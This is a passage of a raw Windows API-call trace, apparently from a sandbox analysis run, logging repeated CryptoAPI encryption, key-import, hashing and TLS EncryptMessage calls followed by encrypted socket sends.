pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.966] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f44c*=0x10) returned 1 [0155.967] malloc (_Size=0x1fd) returned 0x3691478 [0155.967] free (_Block=0x0) [0155.968] free (_Block=0x3691270) [0155.968] free (_Block=0x3d81e60) [0155.968] free (_Block=0x606108) [0155.968] malloc (_Size=0x202) returned 0x606108 [0155.968] free (_Block=0x0) [0155.968] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f484, MessageSeqNo=0x0 | out: pMessage=0x316f484) returned 0x0 [0155.968] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0155.968] free (_Block=0x606108) [0155.968] free (_Block=0x3f652c0) [0155.968] free (_Block=0x3691478) [0155.968] GetTickCount () returned 0x1167d26 [0155.969] malloc (_Size=0x10) returned 0x3648ce0 [0155.969] free (_Block=0x0) [0155.969] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ce0*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.969] free (_Block=0x3648ce0) [0155.969] GetTickCount () returned 0x1167d26 [0155.969] malloc (_Size=0x10) returned 0x3648cf8 [0155.969] free (_Block=0x0) [0155.969] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648cf8*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0156.277] free (_Block=0x3648cf8) [0156.277] GetTickCount () returned 0x1167e4f [0156.277] malloc (_Size=0x50) returned 0x3d9ab98 [0156.277] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0156.277] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5b0 [0156.277] SetEvent (hEvent=0x380) returned 1 [0156.277] malloc (_Size=0x34) returned 0x36241f0 [0156.277] malloc (_Size=0x338) returned 0x3691270 [0156.277] malloc (_Size=0x80) returned 0x60a2d0 [0156.278] free (_Block=0x0) [0156.278] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a2d0 | out: pbBuffer=0x60a2d0) returned 1 [0156.278] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f110, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f10c | out: phKey=0x316f10c*=0x3e1498) returned 1 [0156.283] CryptExportKey (in: hKey=0x3e1498, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316ed6c, pdwDataLen=0x316ed54 | out: pbData=0x316ed6c*, pdwDataLen=0x316ed54*=0x90) returned 1 [0156.283] free (_Block=0x60a2d0) [0156.283] malloc (_Size=0x10) returned 0x3648f38 [0156.284] free (_Block=0x0) [0156.284] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648f38 | out: pbBuffer=0x3648f38) returned 1 [0156.284] malloc (_Size=0x40) returned 0x3e22470 [0156.284] free (_Block=0x0) [0156.284] malloc (_Size=0x104) returned 0x3df0550 [0156.284] free (_Block=0x3e22470) [0156.284] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x605a18, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f30c, pcbStructInfo=0x316f2e4 | out: pvStructInfo=0x316f30c, pcbStructInfo=0x316f2e4) returned 1 [0156.284] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f30c, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f308 | out: phKey=0x316f308*=0x3e15d8) returned 1 [0156.284] malloc (_Size=0x80) returned 0x6098b8 [0156.284] free (_Block=0x0) [0156.284] CryptEncrypt (in: hKey=0x3e15d8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x6098b8*, pdwDataLen=0x316f2d8*=0x56, dwBufLen=0x80 | out: pbData=0x6098b8*, pdwDataLen=0x316f2d8*=0x80) returned 1 [0156.284] CryptDestroyKey (hKey=0x3e15d8) returned 1 [0156.284] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f3a8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f3a4 | out: phKey=0x316f3a4*=0x3e15d8) returned 1 [0156.284] CryptSetKeyParam (hKey=0x3e15d8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0156.285] malloc (_Size=0x3a) returned 0x3e22080 [0156.285] free (_Block=0x0) [0156.285] CryptEncrypt (in: hKey=0x3e15d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10) returned 1 [0156.285] CryptEncrypt (in: hKey=0x3e15d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10) returned 1 [0156.285] CryptEncrypt (in: hKey=0x3e15d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10) returned 1 [0156.285] CryptEncrypt (in: hKey=0x3e15d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2b8*, pdwDataLen=0x316f21c*=0x10) returned 1 [0156.285] CryptDestroyKey (hKey=0x3e15d8) returned 1 [0156.285] malloc (_Size=0x100) returned 0x606108 [0156.285] free (_Block=0x0) [0156.285] free (_Block=0x0) [0156.285] free (_Block=0x3e22080) [0156.285] free (_Block=0x6098b8) [0156.285] free (_Block=0x3df0550) [0156.285] free (_Block=0x3648f38) [0156.285] malloc (_Size=0xba) returned 0x3df0550 [0156.285] free (_Block=0x0) [0156.285] malloc (_Size=0x202) returned 0x3d81e60 [0156.285] free (_Block=0x0) [0156.285] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f3f4, MessageSeqNo=0x0 | out: pMessage=0x316f3f4) returned 0x0 [0156.285] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0156.286] free (_Block=0x3d81e60) [0156.286] free (_Block=0x3df0550) [0156.286] free (_Block=0x606108) [0156.286] GetTickCount () returned 0x1167e5f [0156.286] malloc (_Size=0x10) returned 0x3648e90 [0156.286] free (_Block=0x0) [0156.286] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e90*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0156.286] free (_Block=0x3648e90) [0156.286] GetTickCount () returned 0x1167e5f [0156.287] malloc (_Size=0x10) returned 0x3648f38 [0156.287] free (_Block=0x0) [0156.287] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648f38*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0156.465] free (_Block=0x3648f38) [0156.465] GetTickCount () returned 0x1167f0b [0156.465] SetEvent (hEvent=0x380) returned 1 [0156.465] malloc (_Size=0x34) returned 0x3624570 [0156.465] malloc (_Size=0x338) returned 0x36915b0 [0156.465] malloc (_Size=0x80) returned 0x609cf8 [0156.465] free (_Block=0x0) [0156.466] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x609cf8 | out: pbBuffer=0x609cf8) returned 1 [0156.466] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f120, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f11c | out: phKey=0x316f11c*=0x3e1858) returned 1 [0156.469] CryptExportKey (in: hKey=0x3e1858, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316ed7c, pdwDataLen=0x316ed64 | out: pbData=0x316ed7c*, pdwDataLen=0x316ed64*=0x90) returned 1 [0156.469] free (_Block=0x609cf8) [0156.469] malloc (_Size=0x10) returned 0x3648ce0 [0156.469] free (_Block=0x0) [0156.469] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648ce0 | out: pbBuffer=0x3648ce0) returned 1 [0156.469] malloc (_Size=0x40) returned 0x3e226f8 [0156.470] free (_Block=0x0) [0156.470] malloc (_Size=0x104) returned 0x606108 [0156.470] free (_Block=0x3e226f8) [0156.470] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3d81660, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f31c, pcbStructInfo=0x316f2f4 | out: pvStructInfo=0x316f31c, pcbStructInfo=0x316f2f4) returned 1 [0156.470] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f31c, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f318 | out: phKey=0x316f318*=0x4327b8) returned 1 [0156.470] malloc (_Size=0x80) returned 0x609c70 [0156.470] free (_Block=0x0) [0156.470] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x609c70*, pdwDataLen=0x316f2e8*=0x56, dwBufLen=0x80 | out: pbData=0x609c70*, pdwDataLen=0x316f2e8*=0x80) returned 1 [0156.470] CryptDestroyKey (hKey=0x4327b8) returned 1 [0156.470] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f3b8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f3b4 | out: phKey=0x316f3b4*=0x4329f8) returned 1 [0156.470] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0156.470] malloc (_Size=0x3a) returned 0x3e22080 [0156.470] free (_Block=0x0) [0156.470] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10) returned 1 [0156.470] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10) returned 1 [0156.470] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10) returned 1 [0156.470] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10, dwBufLen=0x10 | out: pbData=0x316f2c8*, pdwDataLen=0x316f22c*=0x10) returned 1 [0156.470] CryptDestroyKey (hKey=0x4329f8) returned 1 [0156.471] malloc (_Size=0x100) returned 0x606218 [0156.471] free (_Block=0x0) [0156.471] free (_Block=0x0) [0156.471] free (_Block=0x3e22080) [0156.471] free (_Block=0x609c70) [0156.471] free (_Block=0x606108) [0156.471] free (_Block=0x3648ce0) [0156.471] malloc (_Size=0xd4) returned 0x606108 [0156.471] free (_Block=0x0) [0156.471] malloc (_Size=0xd4) returned 0x3d81e60 [0156.471] free (_Block=0x0) [0156.471] free (_Block=0x0) [0156.471] malloc (_Size=0x1fd) returned 0x3def010 [0156.471] free (_Block=0x0) [0156.471] CryptHashData (hHash=0x3e15d8, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0156.471] CryptDuplicateHash (in: hHash=0x3e15d8, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f414 | out: phHash=0x316f414) returned 1 [0156.471] malloc (_Size=0x14) returned 0x3f65300 [0156.471] free (_Block=0x0) [0156.471] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x316f3ac, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x316f3ac) returned 1 [0156.471] CryptDestroyHash (hHash=0x4327f8) returned 1 [0156.471] free (_Block=0x3f65300) [0156.471] malloc (_Size=0x1fd) returned 0x3def218 [0156.471] free (_Block=0x0) [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.472] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.473] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.474] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.474] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.474] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.474] CryptEncrypt (in: hKey=0x3e1618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10, dwBufLen=0x10 | out: pbData=0x3df0594*, pdwDataLen=0x316f364*=0x10) returned 1 [0156.474] malloc (_Size=0x1fd) returned 0x3def420 [0156.474] free (_Block=0x0) [0156.474] free (_Block=0x0) [0156.474] free (_Block=0x3def218) [0156.474] free (_Block=0x3def010) [0156.474] malloc (_Size=0x202) returned 0x3def628 [0156.474] free (_Block=0x0) [0156.474] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f39c, MessageSeqNo=0x0 | out: pMessage=0x316f39c) returned 0x0 [0156.474] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0156.475] free (_Block=0x3def628) [0156.475] free (_Block=0x3d81e60) [0156.475] free (_Block=0x3def420) [0156.475] free (_Block=0x606108) [0156.475] free (_Block=0x606218) [0156.475] GetTickCount () returned 0x1167f1a [0156.475] malloc (_Size=0x10) returned 0x3648f08 [0156.475] free (_Block=0x0) [0156.475] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648f08*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0156.475] free (_Block=0x3648f08) [0156.475] GetTickCount () returned 0x1167f1a [0156.475] malloc (_Size=0x10) returned 0x3648e30 [0156.475] free (_Block=0x0) [0156.475] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e30*=0x380, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0156.813] free (_Block=0x3648e30) [0156.813] GetTickCount () returned 0x1168072 [0156.813] malloc (_Size=0x78) returned 0x3d66630 [0156.813] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d0 [0156.813] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d4 [0156.813] malloc (_Size=0x20) returned 0x3d80300 [0156.813] free (_Block=0x0) [0156.813] SetEvent (hEvent=0x380) returned 1 [0156.813] free (_Block=0x0) [0156.813] malloc (_Size=0x1fd) returned 0x606108 [0156.814] free (_Block=0x0) [0156.814] CryptHashData (hHash=0x432df8, pbData=0x606108, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0156.814] CryptDuplicateHash (in: hHash=0x432df8, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f444 | out: phHash=0x316f444) returned 1 [0156.814] malloc (_Size=0x14) returned 0x3f65280 [0156.814] free (_Block=0x0) [0156.814] CryptGetHashParam (in: hHash=0x432738, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x316f3dc, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x316f3dc) returned 1 [0156.814] CryptDestroyHash (hHash=0x432738) returned 1 [0156.814] free (_Block=0x3f65280) [0156.814] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.814] free (_Block=0x0) [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: hKey=0x432eb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x316f394*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x316f394*=0x10) returned 1 [0156.814] CryptEncrypt (in: 